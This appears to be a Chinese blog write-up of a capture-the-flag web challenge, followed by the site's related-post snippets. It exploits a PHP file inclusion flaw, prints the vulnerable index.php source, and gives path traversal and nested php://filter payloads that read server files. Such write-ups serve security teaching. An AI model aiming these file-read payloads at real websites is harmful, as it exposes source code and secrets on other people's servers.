[BSidesCF 2020]Had a bad day_WP

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量447 收藏
点赞数
文章标签: php web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53738407/article/details/122626981
版权

分析

文章目录

  • 打开题目后是有两个按钮的一个页面

  • -

  • 分别打开,可以看到url栏的变换

  • http://04705a2c-5cf1-465e-8749-5822f3e05e20.node4.buuoj.cn:81/index.php?category=woofers

  • 猜测是sql注入或者文件包含

  • 我们将url后加上单引号闭合

  • 在这里插入图片描述

  • 可以判断为文件包含漏洞

  • 无法直接包含到/flag,我们尝试用伪协议读取index.php的源码看看

  • php://filter/read=convert.base64-encode/resource=index

  • 在这里插入图片描述

解码得

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

strpos() 函数查找字符串在另一字符串中第一次出现的位置。
可以得出所传参数必须含有woofers或meowers或index

  • 我们试着包含一下flag

  • ?category=woofers/../flag

  • 在这里插入图片描述

  • 发现源码中的提醒,现在只需要伪协议读取即可

  • 在这里有一个小trick:php://filter伪协议可以套一层协议

  • php://filter/read=convert.base64-encode/index/resource=flag

  • 这样便可以保证url传入的参数中既有index,又可以读取flag的源码

  • 在这里插入图片描述

  • 解码即可得flag

  • 在这里插入图片描述

payload

php://filter/read=convert.base64-encode/index/resource=flag

Acco_30_L
关注
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 706
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
爬虫学习笔记(十)数据存储——xml、json、csv 2020.5.9
闵行小鱼塘
05-09 1426
本节学习数据存储的xml、json、csv
[BSidesCF 2020]Had a bad day -wp
freerats的博客
08-06 304
发现有一个参数,考虑一下注入 加个’单引号发现报错 出现include(woofers’.php),怀疑有文件包含漏洞,用php协议读取一下内容 index.php?category=php://filter/read=convert.base64-encode/resource=index 看上面的报错可以知道,它在会帮参数自动添加.php,所以不需要自己加(加了后读不出东西,会报错,可以发现有两个php后缀,也可以发现问题) 转码一下 <?php $file = $_GET['catego.
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5599
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
BUUCTF_[BSidesCF 2020]Had a bad day
最新发布
m_de_g的博客
04-26 658
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
[BSidesCF_2020]Had_a_bad_day
m0_52199518的博客
04-05 323
WP 可以说,这个题目就是教学题目,虽然我不会 这里考查php伪协议嵌套 跨进题目的大门就要找到注入点,这里在看到url的形式后联想/尝试文件包含,我完全没有往这里想,反而鬼畜的想到了模板注入, 而且差点忘了直接访问flag.php确定flag值位置,习惯太糟糕了 在选择按钮后URL为 http://d4a987de-9150-4004-9493-9173f710ba17.node3.buuoj.cn/index.php?category=woofers http://d4a987de-9150-4004
[BSidesCF 2020]Had a bad day
qq_43801002的博客
08-03 1515
题目 过程 1.点击一个按钮,注意到url有点类似伪协议。用poc尝试一下读取index.php php://filter/read=convert.base64-encode/resource=index 出现base64,解码得源码。只放出有参考意义的片段。原来是后面做了拼接,所以前面的poc才不能加.php <?php   $file = $_GET['category'];      if(isset($file))   {     if( strpos( $file, "woofers"
【2022跨年】最浪漫的表白烟花,送给新的一年的自己(源码)
热门推荐
m0_67390969的博客
03-02 4万+
先建立一个images文件夹: 放入一张小表情图片:a8.png jquery.min.js: /*! jQuery v2.0.0 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license //@ sourceMappingURL=jquery.min.map */ (function(e,undefined){var t,n,r=typeof undefined,i=e.location,o=e.document,s=o.document.
News Pipeline
anqi3776的博客
12-25 888
News PipelineReal Time News Scraping and Recommendation SystemBuilding RecordPOST DesignReact Frontend UINodeJS Web ServerRestFul API features (By Routing)Frontend and Backend Http Protocol(RESTful API)Backend - SOA (Service Oriented Architrcture) DesignBa
实现下列数据去重:13. A police officer claimed that the young man had attempted to_________paying his fare. A. avoid B. reject C. refuse [答案] A13. A police officer claimed that the young man had attempted to_________paying his fare. A. avoid B. reject C. refuse [答案] A
06-05
A police officer claimed that the young man had attempted to_________paying his fare. A. avoid B. reject C. refuse [答案] A', '13. A police officer claimed that the young man had attempted to________...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Acco_30_L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值